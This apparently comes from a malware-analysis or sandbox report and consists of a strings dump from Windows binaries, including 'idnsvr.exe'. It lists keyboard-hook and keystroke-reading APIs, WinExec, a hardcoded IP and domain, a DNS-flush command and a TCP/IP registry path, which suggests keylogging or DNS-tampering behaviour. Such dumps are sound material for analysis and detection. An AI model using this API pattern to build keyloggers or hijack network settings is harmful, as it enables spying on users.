,-./0123</pre><pre>user32.dll</pre><pre>GetKeyboardType</pre><pre>advapi32.dll</pre><pre>RegOpenKeyExA</pre><pre>RegCloseKey</pre><pre>ReportEventA</pre><pre>RegFlushKey</pre><pre>RegCreateKeyExA</pre><pre>WinExec</pre><pre>GetCPInfo</pre><pre>version.dll</pre><pre>gdi32.dll</pre><pre>SetViewportOrgEx</pre><pre>UnhookWindowsHookEx</pre><pre>SetWindowsHookExA</pre><pre>MsgWaitForMultipleObjects</pre><pre>MapVirtualKeyA</pre><pre>LoadKeyboardLayoutA</pre><pre>GetKeyboardState</pre><pre>GetKeyboardLayoutList</pre><pre>GetKeyboardLayout</pre><pre>GetKeyState</pre><pre>GetKeyNameTextA</pre><pre>EnumWindows</pre><pre>EnumThreadWindows</pre><pre>ActivateKeyboardLayout</pre><pre>wininet.dll</pre><pre>333333333333333333</pre><pre>33333833</pre><pre>3333339</pre><pre>3333333333333338</pre><pre>:*"*"$3338</pre><pre>3333333</pre><pre>33333333</pre><pre>33333333333</pre><pre>3333333333338</pre><pre>33338?383</pre><pre>333333333333</pre><pre>:*3:"$3338</pre><pre>333333333333333</pre><pre>KWindows</pre><pre>UrlMon</pre><pre>0IdHTTPHeaderInfo</pre><pre> IdTCPServer</pre><pre>IdTCPStream</pre><pre>.SHDocVw_TLB</pre><pre>Font.Charset</pre><pre>Font.Color</pre><pre>Font.Height</pre><pre>Font.Name</pre><pre>Font.Style</pre><pre>OnExecute</pre><pre>http://www.w3.org/2001/XMLSchema</pre><pre>http://www.w3.org/2000/xmlns/</pre><pre>http://www.w3.org/2001/XMLSchema-instance</pre><pre>http://www.easy78.cn</pre><pre>Command not supported.</pre><pre>Address type not supported.$Error accepting connection with SSL.</pre><pre>Error creating SSL context. Could not load root certificate.</pre><pre>Could not load certificate.#Could not load key, check password.</pre><pre>SSL status: "%s"</pre><pre>Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.</pre><pre>0Address family not supported by protocol family.</pre><pre>Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.</pre><pre>Operation would block.</pre><pre>Operation now in progress.</pre><pre>Operation already in progress.</pre><pre>Socket operation on non-socket.</pre><pre>Protocol not supported.</pre><pre>Socket type not supported."Operation not supported on socket.</pre><pre>Protocol family not supported.</pre><pre>Max line length exceeded.*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)</pre><pre>Resolving hostname %s.</pre><pre>Connecting to %s.</pre><pre>Chunk StartedDThis authentication method is already registered with class name %s.</pre><pre>%s is not a valid service.</pre><pre>Socket Error # %d</pre><pre>Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.4Failed attempting to retrieve time zone information.</pre><pre>File "%s" not found1Only one TIdAntiFreeze can exist per application.</pre><pre>No data to read.$Can not bind in port range (%d - %d)</pre><pre>Invalid Port Range (%d - %d)</pre><pre><Selected DOM Vendor does not support this property or method><pre>Node "%s" not found</pre><pre>IDOMNode required.Attributes are not supported on this node type</pre><pre>Invalid node type Mismatched paramaters to RegisterChildNodes Element does not contain a single text node4DOM Implementation does not support IDOMParseOptions</pre><pre>Node is readonlyCRefresh is only supported if the FileName or XML properties are set</pre><pre>No help keyword specified.</pre><pre>OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters</pre><pre>OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s)"%s" DOMImplementation already registered</pre><pre>No matching DOM Vendor: "%s"</pre><pre>No help found for %s#No context-sensitive help installed$No topic-based help system installed</pre><pre>shutdown(Service failed in custom message(%d): %s</pre><pre>Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"</pre><pre>Alt Clipboard does not support Icons</pre><pre>Cannot open clipboard/Menu '%s' is already being used by another form</pre><pre>Service failed on %s: %s</pre><pre> Cannot focus a disabled or invisible window!Control '%s' has no parent window</pre><pre>Thread Error: %s (%d)</pre><pre>Metafile is not valid!Cannot change the size of an icon Invalid operation on TOleGraphic</pre><pre>Unsupported clipboard format</pre><pre>List capacity out of bounds (%d)</pre><pre>List count out of bounds (%d)</pre><pre>List index out of bounds (%d) Out of memory while expanding memory stream</pre><pre>Error reading %s%s%s: %s</pre><pre>Failed to get data for '%s'</pre><pre>Failed to set data for '%s'</pre><pre>Resource %s not found</pre><pre>%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group</pre><pre>Property %s does not exist</pre><pre>Thread creation error: %s</pre><pre>Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread</pre><pre>Class %s not found</pre><pre>A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates</pre><pre>Cannot create file "%s". %s</pre><pre>Cannot open file "%s". %s</pre><pre>Invalid stream format$''%s'' is not a valid component name</pre><pre>Invalid data type for '%s'</pre><pre>Ancestor for '%s' not found</pre><pre>Cannot assign a %s to a %s</pre><pre>Interface not supported</pre><pre>%s (%s, line %d)</pre><pre>Abstract Error?Access violation at address %p in module '%s'. %s of address %p</pre><pre>System Error. Code: %d.</pre><pre>Invalid variant operation</pre><pre>Invalid NULL variant operation%Invalid variant operation (%s%.8x)</pre><pre>%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)</pre><pre>Operation not supported</pre><pre>External exception %x</pre><pre>Invalid pointer operation</pre><pre>Invalid class typecast0Access violation at address %p. %s of address %p</pre><pre>Privileged instruction(Exception %s in module %s at %p.</pre><pre>Application Error1Format '%s' invalid or incompatible with argument</pre><pre>No argument for format '%s'"Variant method calls not supported</pre><pre>!'%s' is not a valid integer value</pre><pre>I/O error %d</pre><pre>Integer overflow Invalid floating point operation</pre><b>idnsvr.exe_4052:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>user32.dll</pre><pre>WinExec</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegOpenKeyExA</pre><pre>RegNotifyChangeKeyValue</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>SHLWAPI.dll</pre><pre>COMCTL32.dll</pre><pre>WS2_32.dll</pre><pre>GetCPInfo</pre><pre>advapi32.dll</pre><pre>cnprovh.dll</pre><pre>FinalMsg</pre><pre>repreg.dat</pre><pre>replace.dat</pre><pre>ctrcfg.ini</pre><pre>usrcfg.ini</pre><pre>idnsvr.dll</pre><pre>\\.\CnTran</pre><pre>159.226.1.19</pre><pre>xn--cnnic-vo0ll97o.xn--fiqs8s</pre><pre>ipconfig.exe /flushdns</pre><pre>SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces</pre><pre>%Program Files%\OCINS\</pre><pre>dnsvr.exe</pre><pre>%Program Files%\OCINS\idnsvr.exe</pre><pre>.Xtnz</pre><pre>version="1.0.0.0"</pre><pre>name="Microsoft.Windows.Common-Controls"</pre><pre>version="6.0.0.0"</pre><pre>publicKeyToken="6595b64144ccf1df"</pre><pre>2, 6, 0, 0</pre><pre>idnsvr.exe</pre><pre>1.2.6.7</pre><pre>Arrange Icons/Arrange windows so they overlap</pre><pre>Cascade Windows5Arrange windows as non-overlapping tiles</pre><pre>Tile Windows5Arrange windows as non-overlapping tiles</pre><pre>Tile Windows(Split the active window into panes</pre><pre>Replace%Select the entire document</pre></Selected></pre></pre></pre></pre></Selected></pre></pre></pre>